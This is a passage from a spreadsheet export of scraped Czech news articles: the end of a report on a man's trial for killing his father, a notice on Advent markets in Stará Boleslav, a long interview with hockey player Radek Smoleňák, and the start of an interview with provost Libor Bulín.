kolegy ze státní policie. Ti vzápětí mrtvolu našli. Hlasy zločinu Časopis je dostupný od 25. září na stáncích a také zde . Kriminalisté věděli, že mají co do činění s hrdelním trestným činem, a podle toho vypadalo následné pátrání po jeho pachateli. Na Dušana byl vydán zatykač, s prosbou o pomoc se obrátili i na veřejnost – s tím, že muž na útěku je pravděpodobně ozbrojený a nebezpečný a nikdo se ho nemá pokoušet zadržet svépomocí. Své k tomu pověděli také oslovení odborníci na lidskou duši. „Buď útěk, nebo sebevražda,“ odpověděl psycholog Jiří Brančík na dotaz, co se vrahovi pravděpodobně honí hlavou. Strážci zákona začali postupně pracovat s verzí, podle níž Dušan odjel do Českého Krumlova a následně překročil česko-německou státní hranici. Dnes už víme, že se nemýlili. Němečtí policisté dopadli Kocmana, na kterého byl mezitím vydán evropský zatykač, v Dolním Bavorsku – konkrétně u nenápadné obce Hinterschmiding, ležící u hlavního silničního tahu ze Strážného na Pasov . Vrah poté tvrdil, že se uniformovaným cizincům sám přihlásil, ale podle německých novinářů byl muž na první pohled nápadný, protože byl promoklý a působil značně zanedbaným dojmem. Utečenec stanul před soudem Ať už to bylo jakkoli, hlavní informací zůstává, že Dušan Kocman byl následně přemístěn do domovského Česka. V polovině října 2023 tady stanul u Krajského soudu v Brně . Svůj skutek nepopíral, část viny se ale snažil shodit na oběť svého brutálního činu. „Ten večer byl vyvrcholením všeho. Otec mě pomlouval a vědomě ponižoval. Nahromadily se ve mně emoce a všechno, co mi dělal, když jsem byl dítě,“ vypověděl. Na své dětství vzpomínal jako na krušné a plné bolesti. „Všude jsem měl modřiny, byl jsem pro něj jako boxovací pytel. Jednou jsem od něj třeba dostal facku přes ucho a po ní mi nějakou dobu hučelo v hlavě,“ stěžoval si. Na údajnou skutečnost, že měla lednová vražda kořeny v období, kdy pachatel vyrůstal, poukazoval také obhájce Erik Janík. Kocman však šel ještě dál, otcovo chování mu prý komplikovalo život i v době, kdy už byl dávno dospělý. „Všude mě pomlouval, že mě musí živit. Přitom jsem prodal auto a dal mu asi šedesát tisíc korun. Nechápal jsem, proč o mně příbuzným a známým vykládá takové věci. Když jsem se k němu přistěhoval, zjistil jsem, že má problémy s alkoholem . A jakmile se napil, choval se jako cholerický nervák,“ popisoval. Osudného večera měl Josef pít už asi třetí den v kuse a projevovat se velmi agresivně. „Snažil se mě vytočit a já už jsem to nechtěl dál poslouchat,“ dodal. Jenže předsedkyně senátu Dita Řepková málokterému z jeho tvrzení uvěřila. Připomněla i to, že podle svědků Josef problémy s alkoholem neměl. „Obžalovaný ho popisuje jako nějaké monstrum, ale lidé o něm mluví jako o usměvavém a v rodině respektovaném člověku,“ přidal se k ní státní zástupce Ivan Hrazdil. Kocmanovo jednání označil za mimořádně brutální. „Bylo to zákeřné a činěné několika mechanismy. Dokážeme si představit tu beznaděj a utrpení oběti.“ Soudkyně Řepková ve finále přihlédla k doznání viny, ale upozornila i na to, že od obžalovaného čekala více lítosti – podle ní neprojevil zklamání sám nad sebou ani projev hlubšího citu. „Pokud mu bylo tak psychicky ubližováno, jak tvrdí, neměl důvod s otcem v jedné domácnosti setrvávat,“ naznačila, jak málo stačilo, aby k vraždě nedošlo. Kocman prohlásil, že ho čin velmi mrzí. „Život mu nevrátím. Trest, který dostanu, přijímám,“ řekl dokonce. Hrozil mu postih v rozmezí 12 až 20 let nepodmíněně. Dostal 16 a půl roku natvrdo, ale navzdory svému tvrzení se proti němu odvolal. Otcovrahovi snížili trest A svým způsobem uspěl. Vrchní soud v Olomouci mu totiž na konci listopadu 2023 postih o něco snížil, a sice na 15 let nepodmíněně. „Nic nepopírám ani nezlehčuju, nechtěl jsem svalovat vinu na otce. Byl to zkrat, nebylo to nic plánovaného. Nikdy jsem nebyl agresivní, ani na rodinu, ani na rodiče,“ nechal se slyšet Dušan Kocman. „Soud měl vzít v úvahu, že jednání bylo provedeno trýznivým způsobem. Ve chvíli, kdy měl muž nasazen igelitový pytel, bylo mu jasné, že jde o poslední chvíle jeho života, o který jej zbavuje jeho syn,“ reagoval na to žalobce Jaroslav Kouřil , který původní trest považoval za spravedlivý. Jeho konečnou výši však označil za akceptovatelnou. Jeden ze zajištěných důkazů na místě činu – kapka krve zavražděného starého muže na radiátoru. Autor: Archiv policie ČR Dušan Kocman se u soudu snažil svou obhajobu postavit na tom, že byl otcem trýzněn a ponižován. Autor: Radim Strachoň, MAFRA Dušan Kocman před Krajským soudem v Brně . Po vraždě uprchl do Německa , kde byl následně zadržen. Autor: Radim Strachoň, MAFRA Boxer je velmi nebezpečná zbraň tvořená ocelovými prsteny, která dokáže dát ráně pěstí nevídanou sílu a způsobit vážná zranění nebo i smrt. (ilustrační snímek) Autor: Policie ČR Dušan Kocman míří před soud. Bezvládného starého muže zmláceného boxerem chladnokrevně spoutal a na hlavu mu nasadil igelitový pytel Autor: Radim Strachoň, MAFRA Dušan Kocman před Krajským soudem v Brně . Ani před soudem neprojevil dostatečnou lítost nad svým činem. Litoval spíš sám sebe. Autor: Radim Strachoň, MAFRA Autor: Jakub Kvasnička Autor Jakub Kvasnička</t>
  </si>
  <si>
    <t>20241201_372_3473480512_570fce931d52022b9129.html</t>
  </si>
  <si>
    <t>570fce931d52022b9129</t>
  </si>
  <si>
    <t>Adventní trhy ve Staré Boleslavi</t>
  </si>
  <si>
    <t>Adventní trhy ve Staré Boleslavi Od neděle 30. listopadu do pondělí 23. prosince budou na staroboleslavském Mariánském náměstí probíhat adventní trhy. Přijďte si zpříjemnit adventní čas. Najdete zde krásné rukodělné výrobky, vánoční stromky nebo cukroví ze soukromé pekárny. U pekařky si budete moci také objednat výbornou vánočku. Nebude chybět ani trdelník a svařené víno . Před Vánoci zde bude možné také koupit čerstvé krůtí maso. A o víkendech bude připraven vždy nějaký ten workshop. Trhy ve Staré Boleslavi budou ve všední dny otevřeny od 12.00 do 18.00. O víkendech od 9.00 do 18.00.</t>
  </si>
  <si>
    <t>20241201_373_3473470665_735f508d1e0f99b8fd07.html</t>
  </si>
  <si>
    <t>735f508d1e0f99b8fd07</t>
  </si>
  <si>
    <t>Není nadávka, která by mě urazila</t>
  </si>
  <si>
    <t>Shrnutí Není nadávka, která by mě urazila Hokejový útočník Radek Smoleňák měl m ít podle lékařů dávno po kariéře, ale hraje dál. Navíc ve stejné výstroji, kt erou obléká už dvacet let Před lety od lékařů slyšel, že kvůli bolavým kyčlím to na žádný velký sport není. Natož na profesionální hokej. Ale nezdolný útočník Radek Smoleňák se nenechal osudem zlomit a hraje dál! Ve 37 letech patří mezi největší osobnosti extraligy, je kladenským kapitánem. Svým pojetím a neohrožeností soupeře dráždí. „Už není žádná nadávka, která by mě dokázala urazit,“ usmívá se světoběžník, který hrál profesionálně v osmi zemích. V rozhovoru pro Nedělní Sport Křížovky mluví také o staré výstroji a suspenzoru, který nosí od mládí. Nakoukl i do NHL , chvíli byl kapitánem reprezentace. Málokdo se může pochlubit tak pestrým hokejovým životopisem. „I proto chci všechno zúročit jako agent,“ říká muž, jenž tuto roli vykonává už teď. Jeho kancelář je v mlýnici před brankou. Tam na něj nikdo nemá. Nechává se mlátit i přesto, že nosí pravěkou výstroj. Už je to pár let, kdy jste mi říkal, že vám lékaři skoro zakazují hrát. A podívejte se… „Je pravda, že nejlepší doktoři v republice mi říkali, že to vůbec není dobrý na jakýkoliv sport. Bylo to zvláštní období. Ale nakonec jsem všechny negativní zprávy překonal a hraju dál. Možná už trochu přesluhuju.“ Na to, že jste kvůli kyčlím i na normální chození měl berle, hrajete celkem dobře, ne? (směje se) „Musím to zaklepat, jsem opravdu fit. Žádnou bolest necítím. Užívám si to. Vím, že jedu nad zdravotní plán. Kyčle jsem dost řešil, vracelo se mi to. Ale teď je to v pohodě. Hraní mě baví možná ještě víc, protože vím, že se blížím k bráně, kterou za chvíli budu zavírat.“ Od lékařů máte zelenou? Neriskujete moc? „Bylo období, kdy jsem nemohl ani chodit, do toho jsem si ještě zlomil patu. Fakt na prd. Sami doktoři jsou překvapení, že se pořád na určité úrovni hýbu a tělo funguje. Jsem opravdu vděčný, že hokej můžu mrskat. Kdybych nevěděl, čím vším jsem si prošel, aktuálně to podle těla nepoznám. Nic necítím, co se týče kyčlí. Takže super.“ Nemáte ani obavy, že se přihlásí po kariéře? „Aktuálně mě to vůbec neomezuje. Ale bůhví, co bude, protože moc dobře vím, že moje tělo za těch dvacet let hraní dostalo hrozně na prdel. O tom není pochyb.“ Bylo někdy období, kdy jste si říkal, že skončíte? „Tak blízko rozhodnutí, co se týče zdraví, jsem nikdy nebyl.“ Ani před třemi lety, kdy vás odstavili v Hradci Králové ? „Vůbec ne. Naopak mě to ještě nakoplo! Protože jsem věděl, že tak končit nechci.“ Jak to myslíte? „Aby mi někdo jiný řekl, že na to nemám nebo o tom takhle vypráví. Já chci končit, až si to řeknu sám. Na to jsem soudnej dost. Od nikoho si nenechám vnucovat negativní myšlenky.“ Takže to pro vás byla spíš pozitivní motivace. „No jasně. Myslím si, že jsem na to celkem dost chytrej. V životě to mám tak, že když mi někdo říká, že to nejde, tak mě to naopak nakopne. Já totiž nesnáším slovo nejde! Pokud slyším, že něco nedokážu nebo neumím, je to pro mě motor, ať si svůj názor strčí do zadku. V tomhle jdu vždycky proti zdi.“ Nešel jste proti zdi i tím, když jste se vrátil do Kladna v době, kdy bylo u dna? „Bylo to jiné v tom, že jsem předtím působil v Hradci , který okupoval jiné příčky, ambice byly velké. Rytíři se motali dole, nebylo to nic moc. Nejsem blbej, věděl jsem, do čeho jdu. Ale i tak to pro mě byla obrovská motivace a lákadlo.“ V čem? „Že si po spoustě let zahraju doma. Už jsem nechtěl rodinu tahat nikam jinam, můžeme být v baráku, mám tady kamarády. Vždycky jsem věděl, že mám ke Kladnu závazek, protože mi otevřelo bránu do hokeje. Vychovalo mě i lidsky. Takže jsem se ohromně těšil. Když jsem rozvázal spolupráci v Hradci , úplně to ze mě spadlo. Bylo to až takové…“ Jaké? „Šlo o hodně silný zážitek. Natočil jsem emotivní video, kde jsem se s fanoušky rozloučil, ukápla i slza. Byl to pro mě fakt těžký. Ale živě si vybavuju, že v momentě, kdy už jsem měl sbaleno a sednul do auta, najednou jsem měl takový zvláštní pocit, který jsem předtím nezažil. Říkal jsem si: Tak jo, jedu domů. Konečně!“ Bylo to až něco mystického? „Neříkám, že jsem spirituálního založení, ale tohle byl opravdu výjimečný zážitek. Velká úleva. Celý to ze mě spadlo.“ Vnímáte to jako kladenský patriot o to víc? „No jasně. Ono se to těžko vysvětluje. Pokud někde vyrůstáš a potom za ten tým hraješ, je to jiný. Neříkám, že kluci, kteří jsou odjinud, to mají u zadku. V žádným případě. Ale pro mě je to srdcovka. Budu v Kladně žít dál, mám kluky, kteří tady hrají. Takže na hokeji jako takovým mi záleží. Na mládeži, na všem. Jsem rád, že teď hokeji děláme aspoň trochu reklamu a lidi na stadion dostáváme ve větším počtu.“ Jaké pro vás bylo, když jste chvíli po návratu převzal po Tomáši Plekancovi , který skončil kariéru, kapitánské céčko? „Pleky vycítil, že už je jeho čas, když jsem přišel. Asi se mnou nechtěl hrát. (směje se) Zdraví mu to nedovolilo, což mě trochu mrzelo, protože jsem s Plekym vždycky byl v kontaktu a těšili jsme se, že si spolu zahrajeme. Bohužel k tomu nedošlo. Padlo to tedy na mě. Je to pro mě vzácný. Jak jsem tady vyrůstal, vnímal jsem kapitány jako Pavla Pateru , Pepu Zajíce, potom i Plekyho. Vždycky to byla silná jména. A že jsem s nimi v tom pomyslném balíčku, pro mě hodně znamená. Byli to moji hrdinové.“ Kdo vás nejvíc ovlivnil? „Patýs ( Pavel Patera ) byl vždycky můj nejoblíbenější hráč. Což platí i dodnes. Ale pokud jde o hráčskou pozici, jsem pořád stejný hráč, jako bych to céčko neměl. Těžko se budu měnit. Mám rád zodpovědnost, neschovávám se. Chci být v popředí, být prostě hráčem, který je první na odstřel. Jdu s hlavou na špalek. A jestli jsem kapitán, nebo ne, není až takový rozdíl.“ Přemlouval jste před rokem Plekance , aby ještě pokračoval? „To bylo jeho rozhodnutí. Kdo jinej by to měl vědět než Pleky. Ale vždycky, když ho vidím nebo se sem přijde podívat, ho hecuju, jestli ho nesvrbí ruce a jestli si to nechce se mnou ťuknout. Tak pokaždé odpoví, že se mnou rozhodně ne. (směje se) Hned se zapojil k repre, udělali obrovský úspěch v Praze , má velkou rodinu. Takže si myslím, že je spokojený.“ Když jsme u těch narážek na vaši hru, jak vnímáte podobné vtípky? Třeba Jaromír Jágr si vás s oblibou dobírá, že nemáte talent, nejde vám to, ale držíte se u toho zuby nehty… „No jéjej, takových hlášek je…“ Nevadí vám? „Ani ne. Lidi to říkají, protože dobře vědí, že se neurazím. Ví, že rád přijímám, ale i rozdávám. Srandu miluju, takže se tomu zasměju. A hlavně, dokážu být soudnej a sám moc dobře vím, jaký jsem hráč. Neskromně řeknu, že jsem jeden z nejlepších kolem brány. Tohle je to první, co lidi napadne. Vím, že jsem na ledě, s prominutím, kurva. Že mě nenávidí všude, kam přijedu. Většinou na mě celý stadion řve, že jsem ču…“ A to vás ještě víc nabudí. „No jasně. Mám v sobě velký emoce, všechno prožívám. Chci vyhrávat! Na druhou stranu vím, že na ledě polochodím, nejsem kdovíjak rychlej. Nejsem Pastrňák, abych dělal kličky mezi nohama. Vím, kam patřím, jaký jsem hráč. A rád si z toho sám udělám srandu. Takže si nemyslím, že by mě něco dokázalo urazit, protože lidi mají většinou pravdu.“ Myslíte, že jste to dotáhl díky vůli dál, než na co jste měl talent? „Vím moc dobře, že kdybych s tím, jaký jsem hokejista, teď začínal, asi nehraju profesionální hokej. Protože ten je úplně jinde. Já vychytal dobu, kdy to nebylo tak rychlý, hráči nebyli tolik šikovní, neměli dovednosti jako dneska. Na tu dobu jsem byl, myslím, dobrej. Ale můj talent se absolutně nedotýkal dalších kladenských kluků jako Frolda ( Michael Frolík ), Voras ( Jakub Voráček ) nebo Tlusťoch (Jiří Tlustý). Ti byli úplně někde jinde.“ Takže rozhodla vaše vůle. „Myslím, že jsem si to celý vydřel. Spousta situací byla na prd, ale nějak jsem se s tím dokázal vypořádat a ze všeho jsem vyždímal maximum. Jo, byly věci, které jsem mohl udělat jinak, třeba bych měl kariéru lepší, ale za sebe musím pokorně uznat, že i tak byla fantastická. Možná je v tom něco pravdy, že na to, co umím, byla skvělá a spousta kluků by si to se mnou vyměnila.“ Zahřeje u srdce i to, že i když je vaše síla v práci před brankou, dostal jste se i do popředí bodování extraligy? „Víte, co mi přijde vtipný?“ Že se na to ptám? „Že všichni berou jako senzaci, že umím dát gól. (směje se) Ale když se člověk podívá na moji statistiku, vždycky jsem byl schopný dát kolem dvaceti branek za sezonu a byl jsem v popředí bodování. Nechci, aby to vyznělo namachrovaně, ale pro mě to překvapení není.“ Je to asi tím, že jste byl v posledních letech ve škatulce bojovníků. „Přesně tak. Jsem rád, že nám to s Ríšou Jarůškem a Tondou Melkou sedlo. Nehrajeme samozřejmě nic moc krásnýho na pohled, že bychom si to strkali po super kličkách, ale těší mě, že jsme schopní pomoct týmu.“ Dokáže vás ještě za ty roky nějaká nadávka vytočit? Překvapit? „Mě už nic nerozhodí. Fakt ne. Kolikrát se tomu zasměju, když na mě někdo z protihráčů něco zařve. Nebo když je vtipnej. Ale opravdu netuším, co by se muselo stát, aby mě nasral. Každý mi může nadávat do kohokoliv. Protože já to nikdy neberu osobně. I já můžu klukům nadávat do rodin, do všeho, je mi to jedno. Ale všichni vědí, že po zápase vezmu ty kluky na pivo a jsem s nimi oukej.“ To asi ne každý umí. „Vím o hráčích, kteří se urazí a berou to osobně. Že to, co se stane na ledě, je i v reálu. Ale tak to přece vůbec není. Jenže to už je jejich boj.“ Dokážete toho někdy využít? „No jasně. Za ty roky už dobře vím, kdo je v lize labilní. Vím, na koho co platí. Ale ono to někdy není těžký poznat, kdo je trošku dámička.“ (směje se) Užíváte si momenty, kdy jste před brankou, všichni do vás buší, ale vy stejně neuhnete? „Jak už jsem zmínil – neskromně vím, že jsem v tom dobrej. A musím tam být. Protože to nikdo nechce dělat, přitom to přináší ovoce. Neříkám, že z toho vždycky dám gól, ale minimálně udělám nějaký rozruch, který ostatním spoluhráčům pomůže. Vím, že to je moje parketa.“ Musíte i tohle pořád trénovat? „Samozřejmě. Člověk musí všechno neustále pilovat, jinak je v pytli. V jakémkoliv věku. I po tréninku stojím před brankou a kluci na mě pálí. Nebo zkouším další jiné fígle. Každou dovednost je třeba trénovat. Zeptejte se kluků, kteří hráli s Ovečkinem, kolikrát golfákem po tréninku pálil na branku. A kolikrát ji trefil.“ Co nejvíc bolí, když při zápasech stojíte právě před brankou? „Taková klasika. Krosčeky do zad, sekery, ale to jsou běžný oděrky, které vůbec neřeším. Ani to nevnímám. Prostě mám modřiny, ale to je normální.“ Netrpíte bolestí ještě víc, protože máte na sobě výstroj z počátku kariéry? „Je stará, ale kvalitní. Třeba moje vesta, ještě úplně původní, bílá, od Jofy. Už je to rarita.“ Odkdy ji máte? „Od prvního roku v juniorce v OHL. Takže dvacet let. Stejně jako kopny a lokty. No, a když už jsme u toho, tak suspenzor mám úplně odmalička.“ Počkejte, opravdu? „Nekecám.“ Pořád drží? „Ten plast mám stejný, jenom měním látku, ve které je schovaný.“ Ale i citlivé partie od mládí prošly vývojem, ne? „Abych to vysvětlil. On mi ten suspenzor byl větší, když jsem byl ještě malej. Potom jsem do něj dorostl.“ (směje se) Dobrá… A co další část výstroje? Proč ji neměníte? „Kolikrát jsem měl tendenci, že si vyzkouším něco nového, už jsem si to i nafasoval. Ale po chvíli se prostě vrátím k tomu starýmu. To je stejné jako s hokejkami. Mám stejný model ještě z Finska , když jsem hrával za Pori , což je nějakých třináct let. Nebo brusle. Mám je stejné od sedmnácti let. Akorát vždycky vymění design, ale jinak jsou pořád stejný. Jsou to takový těžký lyžařský přezkáče. I helmu mám starou.“ Je to síla zvyku? „Asi jo. Stejný to mám v životě. Když mám něco rád, nepotřebuju si pořád pořizovat něco novýho. Mobily nebo tak. Jsem spokojený s tím, co mám.“ Nemáte obavy, že se výstroj při zápase na vás rozpadne? „Ne. Těch pět let, co ještě budu hrát, to vydrží! (směje se) Je pravda, že zápasový trenky mi drží jenom na takovou gumičku. A když přijde někdo nový, kdo mě nezná, tak na to čumí, vyvalí oči a říká: ´Ty vole, co to máš na sobě?´ Dělají si ze mě srandu. Ale každý má prostě nějaký fetiš, já mám tohle. (směje se) Snaha to vyměnit byla, ovšem nikdy k tomu nedošlo.“ Děláte kapitánaa týmu, v němž stále hraje majitel Jaromír Jágr . Zdá se, že jste rychle našli společnou řeč. „Jo jo. Známe se dlouhé roky, odehráli jsme i jedno mistrovství a dalších pár zápasů v reprezentaci. Víme o sobě hrozně dlouho. Ale taky jsem byl zvědavý, jak to bude vypadat, protože jsem ho nikdy nezažil na dennodenní bázi v klubu. V nároďáku přijel, odjel.“ A jaké to je? „Cestu k sobě jsme si našli celkem rychle. Pokud řešíme Kladno , většinou najdeme shodu. Často to řešíme, protože nám oběma na klubu hodně záleží, máme jeden cíl. V tomto ohledu nám komunikace funguje skvěle. Vím, že mu vždycky otevřeně můžu říct, co si myslím. A Džegr zase mně. Není to tak, že kolem sebe našlapujeme opatrně. Jdeme přímo na věc a víme, že to oba myslíme upřímně a říkáme si, jak věci jsou. Čehož si vážím.“ Ale taky do sebe dokážete hodně zajíždět, že? „No jasně. Taky je to jenom člověk, který se rád zasměje. A řekl bych, že máme i podobný styl humoru. Takže na sebe pořád něco máme.“ Můžete se vrátit k tomu, co se stalo mezi vámi a koučem Vladimírem Růžičkou v Hradci ? Předtím jste mívali skvělý vztah. „Já ho měl vždycky hodně rád a myslím si, že on mě taky. Ať se stalo cokoliv, budu mu vždycky vděčný za to, že mi dal extrémní šanci v reprezentaci, kterou jsem od nikoho jiného nedostal. Maximálně jsem byl nějaký štěk. Takže na tohle nezapomenu.“ Jenže se něco přihodilo při působení v Mountfieldu . „I tam to bylo zezačátku fajn, jenže pak se stala jedna situace, o které nechci mluvit, protože to bylo v kabině. Nechci nic vynášet. Třeba se mýlím, ale z mého pohledu to byla věc, která to celé otočila o 360 stupňů. Od té doby už to nebylo dobrý, hlavně lidsky. Věděl jsem, že spolu nemůžeme fungovat. Řekl jsem nahlas, že prostě půjdu já, což bych chápal, protože nikdo není víc než tým nebo Růža. Myslím si, že on to cítil stejně, že spolu dál nemůžeme být.“ Což se také stalo, Růžička po sezoně 2020/21 skončil. „Podle mě to bylo dané i tím, že jsme oba silné povahy. Tedy v tom smyslu, že si nenecháme srát na hlavu. Což je dobrá vlastnost. Zákonitě jsme si každý stáli za svým. Přesto si myslím, že mi bylo lehce křivděno, ale tak to prostě je. Hokej není fér. Ani život někdy není fér. Není to tak, že bych na Vláďu Růžičku myslel každý den a přehrával si v hlavě, co se stalo. Jedu dál. I takové věci k hokeji patří. I Růža toho zažil spoustu. Takže mu jenom přeju, aby byl zdravý, aby se dařilo jemu i celé rodině. Není to tak, že bych doma měl kvůli němu vúdú panenku.“ Viděli jste se od té doby? „Mám dojem, že ne. On potom trénoval Litvínov , nepotkali jsme se. Já bych asi neměl problém ho pozdravit, ale někde vzadu mám pořád věci, které jsme řešili, a jeho chování. Takže zase nejsem úplně splachovací. Ale ani ten, kdo…“ (přemýšlí) Kdo nedokáže odpustit? „Nejsem sebestředný idiot, abych se s někým nebavil do konce života kvůli tomu, že jsme měli na nějakou věc jiný názor.“ On z vás udělal v přípravě na domácí šampionát 2015 kapitána, ale potom jste na turnaji skončil na tribuně. A i Jágr vám to neustále předhazuje v rámci špičkování. „No jo, to mám od něj na talíři pořád. Od kapitána do hlediště.“ Jak na to vzpomínáte? „Během sezony v rámci Euro Hockey Tour jsem byl kapitán. Potom přijel Voras ( Jakub Voráček ) a vzal mi to, no… (směje se) Pamatuju si dobře jednu vtipnou situaci. Hráli jsme přípravu ve Znojmě , na pokoji jsme byli pochopitelně s Vorasem. Usínám, a já mu ze srandy říkám: Hele, uznáváš mě jako kapitána nároďáku? On se na mě podíval a povídá: ´Upřímně jako kámoš, rozhodně ne!´“ (směje se) To on byl v Praze kapitán. „Asi za dva dny jsme měli trénink v O2 areně, kde Růža oznámil, že to bude Voras. Tak jsem se na něj podíval a z legrace říkám: Tak tady to máš, vole. Doteď ka z toho máme srandu.“ Vaše kladenská partička, v níž jsou ještě Michael Frolík , Ondřej Pavelec a Jiří Tlustý , pořád drží pevně při sobě, že? „Jasně. To jsou přátelství na celý život. Známe se přes 25 let, každej jsme hodně jinej, ale pořád se vídáme, máme neskutečnou partu. V životě už jsme se posunuli, máme širší záběr, ale neustále něco podnikáme. Jezdíme na naše typické Mácháče, v posledních letech bereme děti na expedici Apalucha, přidal se k nám i Jirka Sekáč, je to super pánská jízda. Neskutečně si to užíváme. Vím, že kdybych potřeboval s něčím pomoct, kdokoliv z kluků je tady pro mě. A naopak. Moc si toho kamarádství vážíme.“ I z vás už je dvojnásobný táta, podle fotek na sociálních sítích si to náramně užíváte. „Neskutečně. V tomhle jsem možná až trochu blázen, i moje paní Hanka si dělá srandu, že jsem až magor. Protože to jsou jenom děti, děti… Já si je vždycky přál. A moji dva kluci, kterým jsou tři a pět, jsou pro nás největší dar. Veškerý čas mimo hokej trávím s nimi, neustále něco podnikáme, nesedíme doma, nepoleháváme. Jsem na ně neskutečně pyšnej, beru je hodně i do kabiny. Vždycky jsem chtěl být táta.“ Kvůli tomu už jste zakotvil v Česku a skončilo putování po světě? „Tohle jsem měl vždycky v hlavě. Až se bude chýlit konec, vrátím se domů. Moje priority už jsou hozený trochu jinam. Pro hokej i pro Kladno udělám vždycky maximum, to asi nemusím ani zdůrazňovat, ale jsou i důležitější věci. Právě rodina.“ Jste rád za respekt, který jste si v lize za celou kariéru vybudoval? „Myslíte ty nadávky, co neustále někde slyším? Nemyslím si, že bych byl nějaká tvář ligy nebo vyprodával stadiony. Od toho máme v týmu jinýho Jardu . (směje se) Ale je pravda, že už mám něco za sebou. A i když na mě řvou fanoušci i protihráči, tak ví, že vždycky dělám jenom to, abych pomohl týmu. Možná i rozhodčí už vnímají, že tady hraju dlouho. Jinak to moc nevnímám. Ostatní kluci mi na ledě tykají. I ti smradi mladí…“ (směje se) Zmínil jste sudí. I u nich už víte, na koho můžete být při komunikaci drsnější, na koho ne? „To ani ne. Vím, že jsou hráči, kteří se před zápasem dívají, kdo píská, aby věděli. Když skončí utkání, nemám vůči rozhodčím zášť. Myslím si, že se k nim chovám slušně. Tu a tam řvu, ale neurážím je sprostě, protože to jsou taky lidi. Každý chybujeme. Stejně jako já něco poseru na ledě, oni občas taky. Jsem přesvědčený, že to nikdy nedělají naschvál. Za ty roky už mě znají, takže dobře ví, že občas prohodím nějaký vtípek. Ale myslím, že na ně nehalekám nějak moc.“ Jak se mění extraliga během let? „Jsem hlavně rád, jak se v posledních dvou letech vracejí výborní čeští kluci. Je to dané hlavně financemi. Liga je na parádní úrovni, skoro každý klub má někoho, na koho se lidi přijdou rádi podívat. I pro mladý kluky je zážitek vidět borce jako Červenka, Sedlák. Kvalita ligy stoupá. Dřív se podceňovala, říkalo se, že není dobrá… Přitom extraliga je extrémně těžká soutěž, silová. Takže jsem rád, že ji ještě hraju.“ Jak dlouho ještě budete? „Neřeším to, beru to ze dne na den. Zdraví mě naučilo neplánovat. Po sezoně mi končí smlouva, uvidíme. V klidu si sedneme a uvidíme, jestli to má cenu, nebo ne. Třeba mě Džegr bude na kolenou přemlouvat, abych hrál dál. (směje se) Taky si to musíme vyhodnotit doma s Hankou. Teď řeším jenom aktuální sezonu a za tým můžu říct, že se popereme o to, abychom už nehráli na spodku.“ FOTO SPORT: MICHAL BERÁNEK , PAVEL MAZÁČ RADEK SMOLEŇÁK Věk: 37 (*3. prosince 1986 v Praze ) Pozice: útočník, křídlo Kariéra: Kingston Frontenacs (OHL, 2004-06), Springfield Falcons (AHL, 2006/07), Johnstown Chiefs (ECHL, 2006/07), Norfolk Admirals (AHL, 2007/08-10), Mississippi Sea Wolves (ECHL, 2007/08), Tampa Bay (2008/09), Chicago (2009/10), Abbotsford Heat (AHL, 2009/10), Sparta (2010/11), Kladno (2010/11), Ässät Pori ( Fin , 2011/12), Pelicans Lahti (2011-13, 2013/14), Timra ( Švéd ., 2012/13), Nižnyj Novgorod (KHL, 2012/13), Mansijsk (KHL, 2013/14), TPS Turku ( Fin , 2014/15), MODO ( Švéd ., 2014/15), Medveščak Záhřeb ( KHL , 2015/16), Slovan Bratislava (KHL, 2016-18), Mountfield HK (2018-23), Rapperswill ( Švýc. , 2018/19), Kladno (2023-?) Bilance v reprezentaci: 27 zápasů/2 góly Bilance v NHL : 7/1 (0+1) Bilance v extralize: 400/238 (137+101) Největší úspěchy: mistr extraligy U20 (s Kladnem 2003/04), stříbro ve finské lize (s Lahti 2011/12), bronz na MS U18 (2004) Hrající agent Smoleňák: Budou noví Pastrňákové Co po kariéře? O tom už má Radek Smoleňák jasno. Bude dál pokračovat v práci agenta, kterou načal už během hraní. „Byl jsem čtrnáct let v cizině, zažil jsem si všechno možné, což je moje velká výhoda. Není situace, kterou bych neznal. Kluky na to můžu připravit,“ říká kladenský útočník, který splnil veškerá licenční kritéria a jeho společnost EFFORTSPORTS je vedená jako oficiální agentura uznávaná Českým hokejem. „Extrémně mě to baví. Postupně jsem si připravoval vizi, potom jsem se do toho pustil,“ přiznává světoběžník, jenž poznal elitní hokej v osmi zemích včetně NHL . „Což považuju za mou největší devizu, protože mladým klukům i rodičům říkám opravdu věci ze života. Myslím to s nimi upřímně. A oni vědí, že se na mě mohou kdykoliv obrátit. Ve všem. Nechci mít až tolik klientů, abych se opravdu každému mohl individuálně věnovat.“ Pochopitelně se domluvil s kladenským majitelem Jaromírem Jágrem , jestli do projektu může jít. „To pro mě byla alfa a omega, abych nedělal něco za jeho zády,“ tvrdí. I tak cítí, že jsou ostatní zavedenější agenti z jeho aktivit lehce nervózní, protože cítí konkurenci. Zatím se zaměřuje na talenty ve věkové hranici od třinácti do šestnácti let. „A musím říct, že někteří kluci jsou fakt extrémně šikovní. Nebojím se říct, že tam jsou noví Pastrňákové,“ hlásí Smoleňák . I když po zimácích při sledování ostatních zápasů tráví hodně času, svoje hraní nešidí. „To absolutně ne. Jsem profík, nikdo nemusí pochybovat, že Kladnu dávám maximum.“ FOTO SPORT: PAVEL MAZÁČ Autor: Zdeněk Janda Autor Zdeněk Janda</t>
  </si>
  <si>
    <t>249000</t>
  </si>
  <si>
    <t>20241201_374_3473471230_15762a4a8efa8cc3b944.html</t>
  </si>
  <si>
    <t>15762a4a8efa8cc3b944</t>
  </si>
  <si>
    <t>Na kávě s panem proboštem</t>
  </si>
  <si>
    <t>Na kávě s panem proboštem S panem proboštem Liborem Bulínem jsme si dali schůzku ve Staré Boleslavi , která je už dlouho jeho domovem. Sedli jsme si v kavárně u dobré kávy a více než hodinu jsme si povídali. Hovořili jsme o zdařilých rekonstrukcích staroboleslavských církevních objektů, o dalších plánech, a především o době adventní. Pane probošte, jak jste spokojen s rokem 2024? Co se v něm povedlo a jak na něj budete vzpomínat? Jedině v dobrém. Do jeho začátku jsem vstoupil se zdravotním handicapem, když jsem si dva týdny před Vánocemi 2023 zlomil ruku, takže jsem si vánoční i novoroční svátky užíval v teple své pracovny. Postupně jsem se však dával do kupy, v čemž mi výrazně pomohla péče boleslavské rehabilitace, za což jí velmi děkuji. Do jara jsem byl fit a mohl se naplno věnovat svým ovečkám. Při pracovní neschopnosti jsem však hodně přemýšlel a vymýšlel, protože na rozdíl od těla hlava fungovala. Mimo jiné mě napadlo, že Boleslav by si zasloužila svoje pivo , a rázem bylo na světě výborné staroboleslavské svatováclavské pivo . Je balené v plechovkách a výborně se prodává. Pokud máte zájem, lze ho zakoupit v našem infocentru. Zeptám se i na rok 2025, co v něm 